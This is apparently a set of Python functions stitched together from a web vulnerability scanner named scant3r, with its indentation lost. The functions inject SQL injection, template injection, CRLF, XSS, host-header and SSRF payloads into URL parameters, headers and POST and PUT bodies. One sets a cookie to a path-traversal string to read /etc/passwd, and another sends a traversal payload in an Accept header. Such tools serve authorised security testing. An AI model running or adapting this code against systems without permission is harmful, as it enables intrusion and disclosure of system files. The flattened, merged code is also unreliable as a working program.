def Get(url):
if methods.Get(url) == 1:
if 1 == 1:
for param in url.split('?')[1].split('&'):
for payload, message in ssti_payloads.items():
r = nq.Get(url)
if r == 0:
break
r = len(findall(message.encode('utf-8'), r.content))
req = nq.Get(url.replace(param, param + en(payload)))
if req == 0:
break
if r < len(
findall(message.encode('utf-8'), req.content)):
bug = {
'name': 'template injection',
'payload': payload,
'method': 'GET',
'parameter': param,
'link': url.replace(param,
param + en(payload)),
'target': url.split('?')[0]
}
show.bug(bug='template injection',
payload=payload,
method='GET',
parameter=param,
link=url.replace(param,
param + en(payload)))
return bug
return None
def Get(url):
for param in url.split('?')[1].split('&'):
for payload in sqli_payloads:
r = nq.Get(url)
if r == 0:
break
save_request.save(r)
req = nq.Get(url.replace(param, param + payload))
if req == 0:
break
for n, e in sql_err.items():
r2 = findall(e.encode('utf-8'), save_request.get().content)
r3 = findall(e.encode('utf-8'), req.content)
if len(r2) < len(r3):
bug = {
'name': 'SQL injection',
'payload': payload,
'method': 'GET',
'parameter': param,
'link': url.replace(param, param + en(payload)),
'target': url.split('?')[0]
}
show.bug(bug='SQL injection',
payload=payload,
method='GET',
parameter=param,
target=url.split('?')[0],
link=url.replace(param, param + en(payload)))
return bug
return None
def Get(url):
d = nq.Dump()
for header in SCAN_Headers:
for payload in sqli_payloads:
all_headers = {}
r = nq.Get(url)
if r == 0:
break
save_request.save(r)
try:
H = nq.Dump()['headers'][header]
P = f'{H}{payload}'
except:
P = payload
for H, V in d['headers'].items():
if H == header:
pass
else:
all_headers[H] = V
all_headers[header] = P
req = REQ(url.split('?')[0], method='GET', headers=all_headers)
if req == 0:
break
for n, e in sql_err.items():
r2 = findall(e.encode('utf-8'), save_request.get().content)
r3 = findall(e.encode('utf-8'), req.content)
if len(r2) < len(r3):
show.bug_Header(bug='SQL injection',
payload=payload,
method='GET',
header=header,
target=url)
break
def Get(url):
d = nq.Dump()
for header in SCAN_Headers:
for payload, message in ssti_payloads.items():
all_headers = {}
r = nq.Get(url)
if r == 0:
break
r = len(findall(message.encode('utf-8'), r.content))
try:
H = nq.Dump()['headers'][header]
P = f'{H}{payload}'
except:
P = payload
for H, V in d['headers'].items():
if H == header:
pass
else:
all_headers[H] = V
all_headers[header] = P
req = REQ(url.split('?')[0], headers=all_headers)
if req == 0:
break
if r < len(findall(message.encode('utf-8'), req.content)):
show.bug_Header(bug='template injection',
payload=payload,
method='GET',
header=header,
target=url)
break
def Get(url):
for param in url.split('?')[1].split('&'):
for payload in crlf_payloads:
r = nq.Get(url.replace(param,param + en(payload)))
if r == 0:
break
if r.headers.get('Header-Test'):
bug = {
'name':'CRLF injection',
'payload':payload.replace('\n','%0a').replace('\r','%0d'),
'method':'GET',
'parameter':param,
'link':url.replace(param,param + en(payload)),
'target':url.split('?')[0]
}
show.bug(
bug='CRLF injection',
payload=payload.replace('\n','%0a').replace('\r','%0d'),
method='GET',
parameter=param,
link=url.replace(param,param + en(payload))
)
return bug
else:
continue
return None
def Get(url):
mt = methods.Get(url)
if mt == 0:
pass
elif mt == 1 and refxss.Get(url) == 1:
for param in url.split("?")[1].split("&"):
for payload in xss_payloads:
req = nq.Get(url.replace(param, param + en(payload)))
if req != 0:
if payload.encode('utf-8') in req.content:
bug = {
'name': 'Corss-site scripting',
'payload': payload,
'method': 'GET',
'parameter': param,
'link': url.replace(param, param + en(payload))
}
show.bug(bug='Cross-site scripting',
payload=payload,
method='GET',
parameter=param,
link=url.replace(param,
param + en(payload)))
return bug
return None
def Get(url):
for param in url.split('?')[1].split('&'):
for payload, message in ssti_payloads.items():
r = nq.Get(url)
if r == 0:
break
r = len(findall(message.encode('utf-8'), r.content))
req = nq.Get(url.replace(param, param + en(payload)))
if req == 0:
break
if r < len(findall(message.encode('utf-8'), req.content)):
show.bug(bug='template injection',
payload=payload,
method='GET',
parameter=param,
link=url.replace(param, param + en(payload)))
break
def Get(url):
try:
if nq.Get(url).status_code != 405:
return 1
else:
return 0
except:
return 0
def run(options):
for url in options['url']:
cookie['usid'] = '../../../../../../../../../../../../../etc/passwd'
nq.Update(cookie=cookie)
r = nq.Get(url)
if r != 0:
if '/usr/sbin/nologin' in r.content.decode():
print("[+] Read /etc/passwd :)")
print('hi')
def httper(url):
try:
url = parser(url)
proto_url = [f'http://{url}', f'https://{url}']
for url in proto_url:
r = nq.Get(url)
if r != 0:
print(r.url)
except Exception as e:
print(e)
def Get(url):
try:
for param in url.split('?')[1].split('&'):
url = url.replace(param, f'{param}scantrrr')
r = nq.Get(url)
if r.content.decode().lower().find('scantrrr') != -1:
return 1
else:
return 0
except:
return 0
def Get(url):
for param in url.split("?")[1].split("&"):
for payload in xss_payloads:
req = nq.Get(url.replace(param, param + en(payload)))
if req != 0:
if payload.encode('utf-8') in req.content:
show.bug(bug='Cross-site scripting',
payload=payload,
method='GET',
parameter=param,
link=url.replace(param, param + en(payload)))
break
def Get(url):
try:
for param in url.split('?')[1].split('&'):
url = url.replace(param, f'{param}scantrrr')
r = nq.Get(url)
for header,value in r.headers.items():
if 'scantrrr' in header or 'scantrrr' in value:
return 1
else:
return 0
except:
return 0
def GO(url,host):
d = "?r="+urlencoder(f'{host}/r')
# print(d)
l = len(ssrf_parameters)
for par in ssrf_parameters:
pay = urlencoder(f'{host}/{par}')
d += f'&{par}={pay}'
# print(d)
if len(d) > l*3:
nq.Get(d)
nq.Post(url.split('?')[0],urlparse(d).query)
d = f"{url.split('?')[0]}?r={host}/r"
def Get(url):
for param in url.split('?')[1].split('&'):
for payload in crlf_payloads:
r = nq.Get(url.replace(param, param + en(payload)))
if r == 0:
break
if 'BLATRUC' == r.headers.get('Header-Test'):
show.bug(bug='CRLF injection',
payload=payload.replace('\n', '%0a').replace(
'\r', '%0d'),
method='GET',
parameter=param,
link=url.replace(param, param + en(payload)))
else:
continue
def scan(host):
try:
payloads = {
'../../../../../../../../../../etc/passwd{{':'root:'
}
for payload,msg in payloads.items():
nq.Update(header={'Accept':payload})
r = nq.Get(host)
if r != 0:
try:
if msg.encode() in r.content:
print(f'[+] Found :> {host}')
finally:
pass
finally:
pass
def GO(host):
h = host
for path, msg in paths.items():
host = urljoin(host, path)
try:
r = nq.Get(host)
if r != 0:
try:
int(msg)
if msg == r.status_code:
print(f'{good} Found :> {host}')
except:
if msg in r.content.decode('utf-8'):
print(f'{good} Found :> {host}')
except:
pass
finally:
host = h
def reflect(link):
try:
for parameter in link.split('?')[1].split('&'):
newparameter = f'><sca{randint(1,20)}nt3r'
newlink = link.replace(parameter, parameter + newparameter)
r = nq.Get(newlink)
if r != 0:
if newparameter in r.content.decode('utf-8'):
print(f'''
{good} Relfected > {newlink}
{info} Parameter > {parameter}
{info} Text > {newparameter}
''')
else:
continue
except:
pass
finally:
pass
def scan(host):
try:
payloads = {
'scan{{6*6}}t3r':'scan36t3r',
'scan${6*6}t3r':'scan36t3r',
'scan<% 6*6 %>t3r':'scan36t3r'
}
for payload,msg in payloads.items():
new_host = urljoin(host,f'{payload}')
r = nq.Get(new_host)
if r != 0:
if msg.encode('utf-8') in r.content:
print(f'''
[+] Found :> {new_host}
''')
break
else:
continue
finally:
pass
def GO(url, host):
l = len(ssrf_parameters)
newurl = url
for par in ssrf_parameters:
pay = f'{host}/{par}'
if newurl != url:
if len(urlparse(newurl).query) > 0:
newurl += f'&{par}={pay}'
else:
newurl += f'?{par}={pay}'
else:
if len(urlparse(url).query) > 0:
newurl += f'&{par}={pay}'
else:
newurl += f'?{par}={pay}'
if len(urlparse(newurl).query.split(
'=')) == parameters_in_one_request + 1:
nq.Get(newurl)
nq.Post(url.split('?')[0], post_data(urlparse(newurl).query))
newurl = url
def scan(host):
try:
payloads = {'scant3r.org': 'scant3r.org'}
for payload, msg in payloads.items():
nq.Update(header={'Host': 'scant3r.org'})
r = nq.Get(host)
if r != 0:
try:
loc = r.headers.get('Location')
if loc:
r = urlparse(loc).netloc
if 'scant3r.org' in r:
print(f'''[+] Found :> {host}''')
break
else:
continue
finally:
pass
finally:
pass
def inject(host):
for param in host.split('?')[1].split('&'):
done = 0
for payload in payloads:
r = nq.Get(host.replace(param,param + payload))
if r != 0:
for header,value in r.headers.items():
if header == 'Header-Test':
if value == 'BLATRUC':
print(f'[{green}CRLF{rest}] Found :> {host.replace(param,param + payload)}')
done = 1
if done == 1:
break
for param in host.split('?')[1].split('&'):
done = 0
for payload in payloads:
data = urlparse(host.replace(param,param + payload)).query
d = post_data(data)
r = nq.Post(host.split('?')[0],d)
if r != 0:
for header,value in r.headers.items():
if header == 'Header-Test':
if value == 'BLATRUC':
print(f'[{green}CRLF{rest}] Found :> {host}\n{info} Method :> POST\n{info} Data :> {data}')
done = 1
if done == 1:
break
for param in host.split('?')[1].split('&'):
done = 0
for payload in payloads:
data = urlparse(host.replace(param,param + payload)).query
d = post_data(data)
r = nq.Put(host.split('?')[0],d)
if r != 0:
for header,value in r.headers.items():
if header == 'Header-Test':
if value == 'BLATRUC':
print(f'[{green}CRLF{rest}] Found :> {host}\n{info} Method :> PUT\n{info} Data :> {data}')
done = 1
if done == 1:
break
def GO(url, host):
for par in ssrf_parameters:
nq.Get(f"{url.split('?')[0]}/?{par}={host}/{par}")
nq.Post(url.split('?')[0], post_data(f'{par}={host}/{par}'))
nq.Put(url.split('?')[0], post_data(f'{par}={host}/{par}'))
